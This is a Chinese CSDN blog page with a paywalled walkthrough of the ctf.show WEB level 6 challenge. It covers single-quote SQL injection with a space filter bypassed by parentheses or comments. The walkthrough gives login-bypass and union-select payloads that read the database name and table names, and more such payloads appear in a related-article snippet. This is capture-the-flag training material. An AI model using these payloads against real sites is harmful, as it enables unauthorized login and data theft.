2024年网安最新ctfshow-WEB-web6_ctf(1)

最新推荐文章于 2024-08-27 02:53:26 发布

2401_84297899

最新推荐文章于 2024-08-27 02:53:26 发布

阅读量1k

点赞数 22

分类专栏：程序员文章标签：前端网络安全

本文链接：https://blog.csdn.net/2401_84297899/article/details/138418746

版权

ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过

先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输

a'or(true)#

成功登录

既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用联合注入获取当前使用的数据库,用户名输入以下payload,密码随便输

a'or(true)union(select(1),database(),3)#

当前数据库是web2

接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错

a'or(true)union(select(1),
(select(group_concat(table_name))from(information_schema.tables)
where(table_schema='web2'))
,3)#

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

2401_84297899

关注关注

22
点赞
踩
26

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

H3C多系列路由器存在前台RCE漏洞（含批量验证poc）

weixin_43567873的博客

04-05

1485

H3C多系列路由器存在前台RCE漏洞（含批量验证poc）

2021年全国职业技能大赛“网络安全赛项”国赛模块B 任务解析（超详细）

Aluxian_的博客

12-17

5344

2021年全国职业技能大赛“网络安全赛项”国赛模块B 任务解析B-5 任务五：隐写术应用1.找出文件夹1中的文件，将文件中的隐藏信息作为Flag值提交；2.找出文件夹2中的文件，将文件中的隐藏信息作为Flag值提交；3.找出文件夹3中的文件，将文件中的隐藏信息作为Flag值提交；4.找出文件夹4中的文件，将文件中的隐藏信息作为Flag值提交；5.找出文件夹5中的文件，将文件中的隐藏信息作为Flag值提交。B-6 任务六：Web安全应用1.获取PHP的版本号作为flag值提交；（例如：5.2.14）2.获取

参与评论您还未登录，请先登录后发表或查看评论

CTF show----web 解题笔记（web签到~web6）

dzqxwzoe的博客

02-02

3393

web签到题web2考查点：1.判断sql注入回显位置2.查当前数据库名称3.查看数据库表的数量4.查表的名字5.查flag表列的数量6.查flag表列的名字7.查flag表记录的数量8.查flag表记录值web3web4web5web6。

ctfshow-萌新-web6（利用二进制绕过获取网站敏感信息）_ctfshow萌新web6

最新发布

2401_86044246的博客

08-27

401

萌新模块 web6关，这一关的考点是intval()函数转换字符串的特性，以及SQL注入漏洞的绕过方式，源码中过滤了单双引号，or，加减乘除号，叹号，异或，hex，select等关键字，推荐使用二进制绕过页面中展示了部分源码，并提示我们 id=1000 时，就是flag这里先上答案，payload如下接下来详细解释一下解题的思路，首先是利用intval()函数转换字符串的特性进行绕过。

【Kafka从入门到放弃系列零】Kafka看这一篇就够了

MaoLin Tian's Blog

01-13

6279

系统间的耦合高怎么办，我们如何不让一个服务过于庞大，一个好的方式就是依据具体的功能模块拆分服务，降低服务的耦合度，服务间的交互可以通过消息传递数据来实现，除此之外Kafka非常适合在线日志收集等高吞吐场景，kafka有更好的吞吐量，内置分区，副本和故障转移，这有利于处理大规模的消息，所以kafka被各大公司广泛运用于消息队列的构建：消息队列模型-生产者消费者模型 Kafka基本概念和架构模型 Kafka工作流程和文件存储机制生产者策略：分区策略、数据可靠性保证、故障转移机制消费者策略：消费方式、分区

有了这个网络安全面试题，面试就像开了挂！（附PDF）

lvaolan的博客

02-26

1150

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！【完整版领取方式在文末！！内容实在太多，不一一截图了。

jquery中attr和prop的区别

12-21

297

在高版本的jquery引入prop方法后，什么时候该用prop？什么时候用attr？它们两个之间有什么区别？这些问题就出现了。关于它们两个的区别，网上的答案很多。这里谈谈我的心得，我的心得很简单：对于HTML元素本身就带有的固有属性，在处理时，使用prop方法。对于HTML元素我们自己自定义的DOM属性，在处理时，使用attr方法。上面的描述也许有点模糊，举几个例子就知道了。 <a href="

【CTF】青少年CTF擂台挑战赛 2024 #Round 1 部分WriteUp

ranfeyyou的博客

03-05

1337

简单的数学题追光者 PHP的后门的WP

2401_84297796的博客

05-03

502

ctf.show WEB模块第11关用session中保存的密码进行登录验证, 将 session中保存的密码清空即可绕过页面中直接给了源码, 很明显是让我们进行代码审计, 源码中将我们输入的密码与 session中保存的密码进行匹配, 两个password相同即可登录成功。

2024年网安最全ctfshow-WEB-web6_ctf(3)

2401_84264583的博客

05-03

769

先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错成功获取数据库中的表 flag , user。

2024年最新ctfshow-WEB-web6_ctf(2)

2301_82056337的博客

05-03

196

接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错。很明显flag就在flag这个表中,接下来我们获取flag表的所有字段,用户名输入以下payload,密码随便输,如果直接赋值payload,记得删掉内容中的空格和换行符,否则会报错。接下来就是获取flag表中的数据了,用户名输入以下payload,密码随便输。成功获取数据库中的表 flag , user。

2024年网安最全ctfshow-WEB-web3_ctfshow web3

2401_84264610的博客

05-01

php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效。页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的include()函数通过GET请求接收一个url参数,那接下来我们就给它传递一个url参数。我们直接在url地址栏中拼接url参数,访问crf_go_go_go文件。很明显这个crf_go_go_go文件就是存放flag的文件。

Java知识体系最强总结(2020版)

热门推荐

csdn_life18的博客

04-07

5万+

本人从事Java开发已多年，平时有记录问题解决方案和总结知识点的习惯，整理了一些有关Java的知识体系，这不是最终版，会不定期的更新。也算是记录自己在从事编程工作的成长足迹，通过博客可以促进博主与阅读者的共同进步，结交更多志同道合的朋友。特此分享给大家，本人见识有限，写的博客难免有错误或者疏忽的地方，还望各位大佬指点，在此表示感激不尽。整理的Java知识体系主要包括基础知识，工具，并发编程，数...

Java知识体系最强（转载）

一刀小诗成长纪

02-03

846

Java知识体系最强总结(2020版) ThinkWon 2019-12-18 10:09:56 ...

bugku-多种方法解决

2202_75317918的博客

03-03

278

bugku 多种方法解决

BUGKU-多种方法解决

m0_65766842的博客

03-02

227

Bugku 多种方法解决

weixin_63289925的博客

02-27

894

下载压缩包解压，发现是一个名为KEY的应用程序尝试着打开，发现无法运行用winhex的打开方式打开KEY，打开之后如下图把最右边的字符串全复制下来，去网上用Base64转图片解密工具进行解密，得到一个二维码用手机进行扫码即可得到flag ...

Bugkuの征程“多种方法解决”

简栏

11-30

330

链接：https://ctf.bugku.com/challenges#%E5%A4%9A%E7%A7%8D%E6%96%B9%E6%B3%95%E8%A7%A3%E5%86%B3 用Winhex打开贝斯64转图片 get 到提示给予一个二维码扫一扫 GET FLAG!

GO语言：遍历文件夹

关注我！带你一路 "狂飙" 到底！

12-02

1051

学习io之后，尤其是文件操作，我们就可以遍历给定的目录文件夹了。可以使用ioutil包下的readDir()方法，这个方法可以获取指定目录下的内容，返回文件和子目录。因为文件夹下还有子文件夹，而ioutil包的ReadDir()只能获取一层目录，所以我们需要自己去设计算法来实现，最容易实现的思路就是使用递归。

CTFShow-Web6

09-06

根据提供的引用内容，CTFShow-Web6可能是一个数据库名。其中，通过注入语句查询数据库web2中的表信息，得到两张表flag和user。具体的注入语句如下所示： ``` username=1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database()#&password=1 ``` ``` username='/**/or/**/1=2/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema='web2'#&password=123 ``` 通过这些注入语句可以得到数据库web2中的两张表信息，分别为flag和user。123 #### 引用[.reference_title] - *1* *2* [CTFshow之web6](https://blog.csdn.net/zzwwhhpp/article/details/116498386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [ctfshow-web6](https://blog.csdn.net/weixin_52497013/article/details/122095160)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]